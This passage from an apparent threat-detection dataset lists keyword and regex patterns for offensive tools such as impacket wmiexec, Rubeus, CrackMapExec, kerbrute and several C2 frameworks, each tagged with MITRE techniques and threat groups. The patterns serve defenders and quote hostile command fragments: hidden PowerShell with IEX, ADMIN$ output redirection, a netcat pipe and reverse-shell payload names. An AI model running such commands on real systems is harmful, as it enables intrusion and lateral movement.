"*cmd.exe /Q /c hostname1> *\\127.0.0.1\ADMIN$\* 2>*",".{0,1000}cmd\.exe\s\/Q\s\/c\shostname1\>\s.{0,1000}\\\\127\.0\.0\.1\\ADMIN\$\\.{0,1000}\s2\>.{0,1000}","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1021.005 - T1047 - T1059.001 - T1059.003 - T1059.005","TA0008 - TA0002 - TA0011","N/A","Dispossessor - HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","38449"
"*cmd.exe /Q /c nslookup 1> *\\127.0.0.1\ADMIN$\* 2>*",".{0,1000}cmd\.exe\s\/Q\s\/c\snslookup\s1\>\s.{0,1000}\\\\127\.0\.0\.1\\ADMIN\$\\.{0,1000}\s2\>.{0,1000}","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1021.005 - T1047 - T1059.001 - T1059.003 - T1059.005","TA0008 - TA0002 - TA0011","N/A","Dispossessor - HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","38452"
"*cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C *\temp*",".{0,1000}cmd\.exe\s\/Q\s\/c\spowershell\.exe\s\-exec\sbypass\s\-noni\s\-nop\s\-w\s1\s\-C\s.{0,1000}\\temp.{0,1000}","offensive_tool_keyword","powershell","likely associated with a PowerShell-based exploit kit such as PowerSploit or Empire","T1059.001 - T1059.003 - T1086 - T1027 - T1105 - T1059.005 - T1059.006 - T1059.007","TA0002 - TA0003 - TA0005 - TA0008 - TA0040","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","38453"
"*cmd.exe /Q /c powershell.exe -nop -w -hidden -c*IEX*",".{0,1000}cmd\.exe\s\/Q\s\/c\spowershell\.exe\s\-nop\s\-w\s\-hidden\s\-c.{0,1000}IEX.{0,1000}","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1021.005 - T1047 - T1059.001 - T1059.003 - T1059.005","TA0008 - TA0002 - TA0011","N/A","Dispossessor - HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","38454"
"*cmd.exe /Q /c powershelll.exe 1> *\\127.0.0.1\ADMIN$\* 2>*",".{0,1000}cmd\.exe\s\/Q\s\/c\spowershelll\.exe\s1\>\s.{0,1000}\\\\127\.0\.0\.1\\ADMIN\$\\.{0,1000}\s2\>.{0,1000}","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1021.005 - T1047 - T1059.001 - T1059.003 - T1059.005","TA0008 - TA0002 - TA0011","N/A","Dispossessor - HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","38455"
"*cmd.exe /Q /c quser 1 > \\127.0.0.1\ADMIN$\*",".{0,1000}cmd\.exe\s\/Q\s\/c\squser\s1\s\>\s\\\\127\.0\.0\.1\\ADMIN\$\\.{0,1000}","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1021.005 - T1047 - T1059.001 - T1059.003 - T1059.005","TA0008 - TA0002 - TA0011","N/A","Dispossessor - HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","38456"
"*cmd.exe /Q /c start *stage1.exe 1*",".{0,1000}cmd\.exe\s\/Q\s\/c\sstart\s.{0,1000}stage1\.exe\s1.{0,1000}","offensive_tool_keyword","malware","Destructive Malware targeting organizations","T1486 - T1059","TA0008","N/A","N/A","Ransomware","https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","38457"
"*cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\_*2>&1*",".{0,1000}cmd\.exe\s\/Q\s\/c\swhoami\s1\>\s\\\\127\.0\.0\.1\\ADMIN\$\\_.{0,1000}2\>\&1.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","observed with wmiexec.py","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","38458"
"*cmd.exe' successfully created with LOGON_TYPE = 9*",".{0,1000}cmd\.exe\'\ssuccessfully\screated\swith\sLOGON_TYPE\s\=\s9.{0,1000}","offensive_tool_keyword","Rubeus","Run Rubeus via Rundll32 (potential application whitelisting bypass technique)","T1558.004 - T1098 - T1110.001 - T1555.003 - T1218.011 - T1085 - T1070.004","TA0005 - TA0002 - TA0006 - TA0008 - TA0009","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/rvrsh3ll/Rubeus-Rundll32","1","0","#content","N/A","10","3","200","32","2020-04-25T19:55:27Z","2020-04-24T20:35:38Z","38459"
"*cmd.exe"" /C tasklist /m > C:\Windows\Temp\*.tmp 2>&1*",".{0,1000}cmd\.exe\""\s\/C\stasklist\s\/m\s\>\sC\:\\Windows\\Temp\\.{0,1000}\.tmp\s2\>\&1.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","observed with wmiexec.py","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","38460"
"*cmd.exe"" /Q /c cd  1> \\127.0.0.1\ADMIN$\_*>&1*",".{0,1000}cmd\.exe\""\s\/Q\s\/c\scd\s\s1\>\s\\\\127\.0\.0\.1\\ADMIN\$\\_.{0,1000}\>\&1.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","observed with wmiexec.py","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","38461"
"*cmd.exe"" /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__* 2>&1*",".{0,1000}cmd\.exe\""\s\/Q\s\/c\scd\s\\\s1\>\s\\\\127\.0\.0\.1\\ADMIN\$\\__.{0,1000}\s2\>\&1.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","observed with dcomexec.py ","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","38462"
"*cmd.exe"" /Q /c whoami 1> \\127.0.0.1\ADMIN$\_*2>&1*",".{0,1000}cmd\.exe\""\s\/Q\s\/c\swhoami\s1\>\s\\\\127\.0\.0\.1\\ADMIN\$\\_.{0,1000}2\>\&1.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","observed with wmiexec.py","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","38463"
"*cmd.exe*/c powershell -windowst hidden *",".{0,1000}cmd\.exe.{0,1000}\/c\spowershell\s\-windowst\shidden\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1059.001 - T1078 - T1086 - T1021.002 - T1046","TA0008 - TA0003 - TA0004 - TA0005 - TA0006 - TA0009 - TA0010 - TA0011","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","typo","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","38465"
"*cmd/bruteforce.go*",".{0,1000}cmd\/bruteforce\.go.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","38470"
"*cmd/bruteuser.go*",".{0,1000}cmd\/bruteuser\.go.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","38471"
"*cmd/kubestroyer*",".{0,1000}cmd\/kubestroyer.{0,1000}","offensive_tool_keyword","Kubestroyer","Kubestroyer aims to exploit Kubernetes clusters misconfigurations and be the swiss army knife of your Kubernetes pentests","T1588.002 - T1596 - T1552.004","TA0005 - TA0007","N/A","N/A","Exploitation tool","https://github.com/Rolix44/Kubestroyer","1","0","N/A","N/A","10","4","359","22","2024-07-26T06:33:00Z","2022-09-15T13:31:21Z","38473"
"*cmd/ligolo*",".{0,1000}cmd\/ligolo.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","AvosLocker - LockBit","C2","https://github.com/sysdream/ligolo","1","1","N/A","N/A","10","10","1764","224","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z","38474"
"*cmd/localrelay*",".{0,1000}cmd\/localrelay.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","AvosLocker - LockBit","C2","https://github.com/sysdream/ligolo","1","1","N/A","N/A","10","10","1764","224","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z","38475"
"*cmd/merlinagent/*",".{0,1000}cmd\/merlinagent\/.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001  -  T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","38476"
"*cmd/merlinagentdll/*",".{0,1000}cmd\/merlinagentdll\/.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001  -  T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","38477"
"*cmd/merlinagentdll/*",".{0,1000}cmd\/merlinagentdll\/.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","1","N/A","N/A","10","10","51","15","2025-04-17T14:01:36Z","2021-04-17T16:58:24Z","38478"
"*cmd/tsh.go*",".{0,1000}cmd\/tsh\.go.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","0","N/A","N/A","10","2","161","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z","38480"
"*cmd/tshd.go*",".{0,1000}cmd\/tshd\.go.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","1","N/A","N/A","10","2","161","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z","38481"
"*cmd/unix/reverse_bash*",".{0,1000}cmd\/unix\/reverse_bash.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","38482"
"*cmd/unix/reverse_python*",".{0,1000}cmd\/unix\/reverse_python.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","38483"
"*cmd:who | nc -u *",".{0,1000}cmd\:who\s\|\snc\s\-u\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","38484"
"*cmd_executor *",".{0,1000}cmd_executor\s.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/freyja/","1","0","N/A","N/A","10","10","54","13","2024-10-29T17:32:07Z","2022-09-28T17:20:04Z","38485"
"*cmd_powershell.cpp*",".{0,1000}cmd_powershell\.cpp.{0,1000}","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","1","N/A","N/A","10","10","47","7","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z","38486"
"*cmd_shellcodex64.*",".{0,1000}cmd_shellcodex64\..{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","38487"
"*cmd_shellcodex86.*",".{0,1000}cmd_shellcodex86\..{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","38488"
"*Cmd-Execute-Assembly.*",".{0,1000}Cmd\-Execute\-Assembly\..{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","38489"
"*Cmd-Inline-Execute.*",".{0,1000}Cmd\-Inline\-Execute\..{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","38490"
"*cmdinspector OFF*",".{0,1000}cmdinspector\sOFF.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","38491"
"*cmdinspector ON*",".{0,1000}cmdinspector\sON.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","38492"
"*CmdLineSpoofer.exe*",".{0,1000}CmdLineSpoofer\.exe.{0,1000}","offensive_tool_keyword","CmdLineSpoofer","How to spoof the command line when spawning a new process from C#","T1055 - T1027 - T1036","TA0002 - TA0004 - TA0010","N/A","N/A","Defense Evasion","https://github.com/plackyhacker/CmdLineSpoofer","1","1","N/A","N/A","9","2","106","17","2021-12-28T18:56:25Z","2021-12-27T09:23:45Z","38494"
"*CmdLineSpoofer.sln*",".{0,1000}CmdLineSpoofer\.sln.{0,1000}","offensive_tool_keyword","CmdLineSpoofer","How to spoof the command line when spawning a new process from C#","T1055 - T1027 - T1036","TA0002 - TA0004 - TA0010","N/A","N/A","Defense Evasion","https://github.com/plackyhacker/CmdLineSpoofer","1","1","N/A","N/A","9","2","106","17","2021-12-28T18:56:25Z","2021-12-27T09:23:45Z","38495"
"*CmdLineSpoofer-master*",".{0,1000}CmdLineSpoofer\-master.{0,1000}","offensive_tool_keyword","CmdLineSpoofer","How to spoof the command line when spawning a new process from C#","T1055 - T1027 - T1036","TA0002 - TA0004 - TA0010","N/A","N/A","Defense Evasion","https://github.com/plackyhacker/CmdLineSpoofer","1","1","N/A","N/A","9","2","106","17","2021-12-28T18:56:25Z","2021-12-27T09:23:45Z","38496"
"*cmdshell *",".{0,1000}cmdshell\s.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","0","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","38497"
"*Cmd-Shinject.*",".{0,1000}Cmd\-Shinject\..{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","38498"
"*Cmd-Upload.*",".{0,1000}Cmd\-Upload\..{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","38499"
"*cme -d * -*",".{0,1000}cme\s\-d\s.{0,1000}\s\-.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Exploitation tool","https://github.com/byt3bl33d3r/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","38500"
"*cme -d *localhost*",".{0,1000}cme\s\-d\s.{0,1000}localhost.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Exploitation tool","https://github.com/byt3bl33d3r/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","38501"
"*cme*-macOS-latest-*",".{0,1000}cme.{0,1000}\-macOS\-latest\-.{0,1000}","offensive_tool_keyword","crackmapexec","macOS default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","38502"
"*cme*-ubuntu-latest-*",".{0,1000}cme.{0,1000}\-ubuntu\-latest\-.{0,1000}","offensive_tool_keyword","crackmapexec","ubuntu default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","38503"
